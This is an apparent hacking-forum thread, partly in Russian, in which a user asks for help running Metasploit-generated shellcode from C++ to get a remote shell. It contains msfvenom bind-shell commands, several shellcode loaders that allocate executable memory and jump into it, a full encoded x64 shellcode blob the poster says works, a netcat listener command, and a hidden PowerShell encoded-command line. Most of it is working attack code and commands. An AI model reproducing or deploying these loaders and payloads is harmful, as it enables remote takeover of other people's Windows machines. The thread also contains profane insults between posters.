Running Shellcode in C++

[qGodless]

I'm generating a shellcode using
msfvenom -p windows/shell_bind_tcp LPORT=80 -f c

Trying to run it using

void main()
{
    const char shellcode[] = "\x09\xf5\x8f (...) ";
    PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
    DWORD threadID;
    for (int i = 0; i < sizeof shellcode; i++)
    {
        ((char*)shellcode_exec)[i] = (((char*)shellcode_exec)[i]) - 13;
    }
    HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
    WaitForSingleObject(hThread, INFINITE);
}

Compiles correctly but Doesn't get a shell in

nc -lvp 80

 

[ragebot]

Are you listening on a VPS? Did you compile to the right architecture?

 

[arsarsov]

((char*)shellcode_exec) = (((char*)shellcode_exec)) - 13;

What this ? its rot13 decrypt ? if you use encryption in msfvenom you dont need manual decrypt shellcode, its self-decrypt
Try generate and run shellcode without any encryptions

 

[qGodless]

Try generate and run shellcode without any encryptions

I couldn't figure out how to bc of my weak knowledge in msf

But I tried this, same result successful compile but no shell

#include <Windows.h>

void main()
{
    const char shellcode[] = "\xfc\xe8\x82 (...) ";
    PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
    DWORD threadID;
    HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
    WaitForSingleObject(hThread, INFINITE);
}

 

[arsarsov]

I'm generating a shellcode using
msfvenom -p windows/shell_bind_tcp LPORT=80 -f c

You need enter RHOST param e.g 127.0.0.1

 

[Pernat1y]

You need enter RHOST param e.g 127.0.0.1

No need for bind shell

 

[qGodless]

No need for bind shell

That's what I thought. I also tried it. but same result

 

[qGodless]

Shellcodes seem alot of work
What if i used this instead? (generated by fatrat)
system("powershell -window hidden -EncodedCommand JABmAFMAdQAgAD0AIAAnACQARgBwAGQAIAA...")

Is it a bad idea, and why

 

[Pernat1y]

Just in case, try this:

msfvenom --payload windows/shell_bind_tcp LPORT=80 --format c --bad-chars '\x00\x0a\xff' --var-name shellcode 2>/dev/null

Also, make sure you compiling binary for x86 and not amd64 (or change shellcode for correct arch).

 

[Quake3]

Выложите сюда шеллкод, иначе это гадание на кофейной гуще. Нужно дебажить, пошагово. В отладчике , когда выделится память, ставите брекпойнт туда и трейсите пошагово асм код.

 

[DildoFagins]

Шеллкод может быть не той архитектуры, что экзешник его запускающий. Точка входа шеллкода может быть не LP_THREAD_START_ROUTINE. Да и вообще, в чем сокральный смысл запускать шелл в отдельном потоке, если основной поток нихера не делает, а только ждет его завершения?

 

[qGodless]

[SOLVED]

CreateRemoteThread Shellcode Injection - Red Team Notes

Injecting shellcode into a local process.

www.ired.team

I don't know what the problem was. But it works now, yayy

 

[qGodless]

#include "Windows.h"

int main()
{

    unsigned char shellcode[] =
        "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef"
        "\xff\xff\xff\x48\xbb\xae\x55\x21\xa2\x41\x4e\xd7\xaf\x48"
        "\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x52\x1d\xa2"
        "\x46\xb1\xa6\x17\xaf\xae\x55\x60\xf3\x00\x1e\x85\xfe\xf8"
        "\x1d\x10\x70\x24\x06\x5c\xfd\xce\x1d\xaa\xf0\x59\x06\x5c"
        "\xfd\x8e\x1d\xaa\xd0\x11\x06\xd8\x18\xe4\x1f\x6c\x93\x88"
        "\x06\xe6\x6f\x02\x69\x40\xde\x43\x62\xf7\xee\x6f\x9c\x2c"
        "\xe3\x40\x8f\x35\x42\xfc\x14\x70\xea\xca\x1c\xf7\x24\xec"
        "\x69\x69\xa3\x91\xc5\x57\x27\xae\x55\x21\xea\xc4\x8e\xa3"
        "\xc8\xe6\x54\xf1\xf2\xca\x06\xcf\xeb\x25\x15\x01\xeb\x40"
        "\x9e\x34\xf9\xe6\xaa\xe8\xe3\xca\x7a\x5f\xe7\xaf\x83\x6c"
        "\x93\x88\x06\xe6\x6f\x02\x14\xe0\x6b\x4c\x0f\xd6\x6e\x96"
        "\xb5\x54\x53\x0d\x4d\x9b\x8b\xa6\x10\x18\x73\x34\x96\x8f"
        "\xeb\x25\x15\x05\xeb\x40\x9e\xb1\xee\x25\x59\x69\xe6\xca"
        "\x0e\xcb\xe6\xaf\x85\x60\x29\x45\xc6\x9f\xae\x7e\x14\x79"
        "\xe3\x19\x10\x8e\xf5\xef\x0d\x60\xfb\x00\x14\x9f\x2c\x42"
        "\x75\x60\xf0\xbe\xae\x8f\xee\xf7\x0f\x69\x29\x53\xa7\x80"
        "\x50\x51\xaa\x7c\xeb\xff\x39\xa4\x9d\xf1\x66\x13\xa2\x41"
        "\x0f\x81\xe6\x27\xb3\x69\x23\xad\xee\xd6\xaf\xae\x1c\xa8"
        "\x47\x08\xf2\xd5\xaf\xaf\xee\xe1\x0a\x40\x21\x96\xfb\xe7"
        "\xdc\xc5\xee\xc8\xbf\x96\x15\xe2\x22\x07\xa5\xbe\x9b\x9b"
        "\x26\x44\x3d\x20\xa3\x41\x4e\x8e\xee\x14\x7c\xa1\xc9\x41"
        "\xb1\x02\xff\xfe\x18\x10\x6b\x0c\x7f\x17\xe7\x51\x95\x69"
        "\x2b\x83\x06\x28\x6f\xe6\xdc\xe0\xe3\xfb\xa4\xd8\x70\x4e"
        "\xaa\xf4\xea\xc8\x89\xbd\xbf\xef\x0d\x6d\x2b\xa3\x06\x5e"
        "\x56\xef\xef\xb8\x07\x35\x2f\x28\x7a\xe6\xd4\xe5\xe2\x43"
        "\x4e\xd7\xe6\x16\x36\x4c\xc6\x41\x4e\xd7\xaf\xae\x14\x71"
        "\xe3\x11\x06\x5e\x4d\xf9\x02\x76\xef\x70\x8e\xbd\xa2\xf7"
        "\x14\x71\x40\xbd\x28\x10\xeb\x8a\x01\x20\xa3\x09\xc3\x93"
        "\x8b\xb6\x93\x21\xca\x09\xc7\x31\xf9\xfe\x14\x71\xe3\x11"
        "\x0f\x87\xe6\x51\x95\x60\xf2\x08\xb1\x1f\xe2\x27\x94\x6d"
        "\x2b\x80\x0f\x6d\xd6\x62\x6a\xa7\x5d\x94\x06\xe6\x7d\xe6"
        "\xaa\xeb\x29\x4f\x0f\x6d\xa7\x29\x48\x41\x5d\x94\xf5\x27"
        "\x1a\x0c\x03\x60\x18\xe7\xdb\x6a\x32\x51\x80\x69\x21\x85"
        "\x66\xeb\xa9\xd2\x5f\xa1\x59\xa1\x3b\xd2\x14\xe9\x46\x53"
        "\xcd\x2b\x4e\x8e\xee\x27\x8f\xde\x77\x41\x4e\xd7\xaf";


    void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}

 

[koeir]

Learn to use debugger and you will get the reason of not working

 

[DildoFagins]

Интересный подход к задаче: взять один шелл из интернетов и склеить его с одним примером его запуска из интернетов, не заработало - спросить на форуме и ничего из предложенных вариантов решения не провертить, взять второй шелл и склеить его со вторым примером его запуска из интернетов, все заработало - радоваться, не понимая, что где и как работает или не работает. Ну окей, раз человек рад, то и мы будем за него рады.

 

[qGodless]

okay, since a person is happy, then we will be happy for him.

As you can see in the title "Running Shellcode in C++" not "I want to learn C++"

Maybe your right I could of just spent more days searching than just asking this useless fucking forum

Maybe you should shut the fuck up. And look for something to do instead of telling me "this forum isn't interesting enough for me nowadays" Because guess what, no one gives a fuck if you don't like my post or any other post in here!

 

[DildoFagins]

As you can see in the title "Running Shellcode in C++" not "I want to learn C++"

Sure, the best way to do hacking these days is to copy paste some shit from the internet without giving shit about what you've just copied and pasted. This actually explains a lot about stuff you've posted here before, like elite techniques of replacing notepad. But thats fine, maybe it would take you some time to learn how to learn.

 

[Th30C0der]

I'm generating a shellcode using
msfvenom -p windows/shell_bind_tcp LPORT=80 -f c

Trying to run it using

void main()
{
    const char shellcode[] = "\x09\xf5\x8f (...) ";
    PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
    DWORD threadID;
    for (int i = 0; i < sizeof shellcode; i++)
    {
        ((char*)shellcode_exec)[i] = (((char*)shellcode_exec)[i]) - 13;
    }
    HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
    WaitForSingleObject(hThread, INFINITE);
}

Compiles correctly but Doesn't get a shell in

nc -lvp 80

You don't need the for loop just use writeprocessmemory

 

[DildoFagins]

You don't need the for loop just use writeprocessmemory

Actually loop is faster, don't use WriteProcessMemory if you are writing data into your own process, if you don't want to write a loop just use something like memcpy or similar functions.

 

[Th30C0der]

Actually loop is faster, don't use WriteProcessMemory if you are writing data into your own process, if you don't want to write a loop just use something like memcpy or similar functions.

ty